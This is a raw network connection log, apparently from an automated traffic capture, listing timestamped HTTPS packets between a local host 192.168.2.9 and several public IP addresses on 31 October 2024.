                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:14.997241974 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:14.998519897 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:14.998527050 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:14.998554945 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:14.998586893 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:14.998615980 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016561985 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016596079 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016603947 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016632080 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016679049 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016696930 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.016741991 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.029294968 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.029354095 CET49938443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.029367924 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.033798933 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.033859015 CET49938443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.033865929 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.038238049 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.038264036 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.038290024 CET49938443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.038292885 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.038301945 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.038331985 CET49938443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.039011955 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.039067984 CET49938443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.039143085 CET49938443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.039159060 CET44349938172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.080540895 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.080554008 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.080590010 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.080657959 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.114598989 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.114614964 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.114653111 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.114675045 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.114723921 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.117993116 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.118005991 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.118052959 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.118072987 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.118088007 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.118110895 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.119119883 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.119131088 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.119170904 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.119183064 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.120007038 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.120017052 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.120059013 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.120074034 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.120093107 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.121735096 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.121771097 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.121798992 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.121809959 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.121828079 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.122437000 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.122502089 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.122509003 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.134581089 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.134661913 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.134676933 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.134905100 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.134917974 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.164426088 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.164532900 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.164549112 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.164721966 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.169691086 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.169699907 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.169760942 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.169774055 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.169787884 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.169831991 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.170347929 CET49937443192.168.2.918.66.27.34
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.170367002 CET4434993718.66.27.34192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214608908 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214684010 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214690924 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214701891 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214709997 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214720964 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214754105 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214757919 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.214791059 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.215286970 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.215292931 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.215322018 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.215348005 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.215353012 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.215378046 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.239682913 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.239695072 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.239715099 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.239758968 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.239764929 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.239814043 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240166903 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240175009 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240189075 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240210056 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240231037 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240484953 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240492105 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240536928 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240540981 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240588903 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240858078 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240864038 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240912914 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.240916967 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.241493940 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.241550922 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.241554976 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.241906881 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.241955042 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.241959095 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.242626905 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.242702007 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.242707968 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.242721081 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.242778063 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.242783070 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.243443966 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.243505001 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.243509054 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.243670940 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.243741989 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.243746996 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.244604111 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.244666100 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.244669914 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.244932890 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.244986057 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.244991064 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.245029926 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.245237112 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.245244026 CET44349950130.61.120.2192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.245259047 CET49950443192.168.2.9130.61.120.2
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.261323929 CET49959443192.168.2.9142.250.185.130
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.261354923 CET44349959142.250.185.130192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.261418104 CET49959443192.168.2.9142.250.185.130
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.263010979 CET49959443192.168.2.9142.250.185.130
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.263020992 CET44349959142.250.185.130192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.266063929 CET49961443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.266093016 CET4434996152.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.266168118 CET49961443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.266339064 CET49961443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.266350031 CET4434996152.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.267870903 CET49962443192.168.2.952.223.40.198
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.267890930 CET4434996252.223.40.198192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.267973900 CET49962443192.168.2.952.223.40.198
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.268779993 CET49962443192.168.2.952.223.40.198
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.268788099 CET4434996252.223.40.198192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.348071098 CET49963443192.168.2.918.239.18.118
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.348134041 CET4434996318.239.18.118192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.348227024 CET49963443192.168.2.918.239.18.118
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.348484039 CET49963443192.168.2.918.239.18.118
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.348503113 CET4434996318.239.18.118192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.682029963 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.688055992 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.688894033 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.689027071 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.692385912 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.736656904 CET49955443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.736691952 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.738447905 CET49964443192.168.2.918.239.50.55
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.738476038 CET4434996418.239.50.55192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.738538980 CET49964443192.168.2.918.239.50.55
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.738655090 CET49955443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.738667965 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.739387989 CET49952443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.739403963 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.741235971 CET49952443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.741266966 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.744497061 CET49954443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.744514942 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.745811939 CET49954443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.745822906 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.746066093 CET49965443192.168.2.918.239.50.55
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.746103048 CET4434996518.239.50.55192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.746165037 CET49965443192.168.2.918.239.50.55
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.746520996 CET49956443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.746587992 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.747176886 CET49956443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.747193098 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.748195887 CET49964443192.168.2.918.239.50.55
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.748212099 CET4434996418.239.50.55192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.749023914 CET49965443192.168.2.918.239.50.55
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.749036074 CET4434996518.239.50.55192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.751800060 CET49957443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.751820087 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.753046036 CET49957443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.753053904 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.864666939 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.865067005 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.865150928 CET49955443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.867053032 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.867130041 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.867183924 CET49952443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.870948076 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.871488094 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.871542931 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.871556044 CET49954443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.871619940 CET49954443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.877342939 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.877376080 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.877427101 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.877456903 CET49956443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.877537966 CET49956443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.880728960 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.880819082 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.880873919 CET49957443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.096863985 CET49955443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.096898079 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.096919060 CET49955443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.096925020 CET4434995513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.097506046 CET49952443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.097553968 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.097579002 CET49952443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.097585917 CET4434995213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.099287033 CET49957443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.099323988 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.099344015 CET49957443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.099349976 CET4434995713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.110903978 CET49954443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.110941887 CET4434995413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.112483025 CET49956443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.112528086 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.112546921 CET49956443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.112554073 CET4434995613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.130031109 CET49974443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.130073071 CET4434997413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.130139112 CET49974443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.132808924 CET49974443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.132822037 CET4434997413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.138851881 CET49975443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.138900995 CET4434997513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.138962984 CET49975443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.139511108 CET49975443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.139528990 CET4434997513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.144392014 CET49976443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.144439936 CET4434997613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:16.144510031 CET49976443192.168.2.913.107.246.45
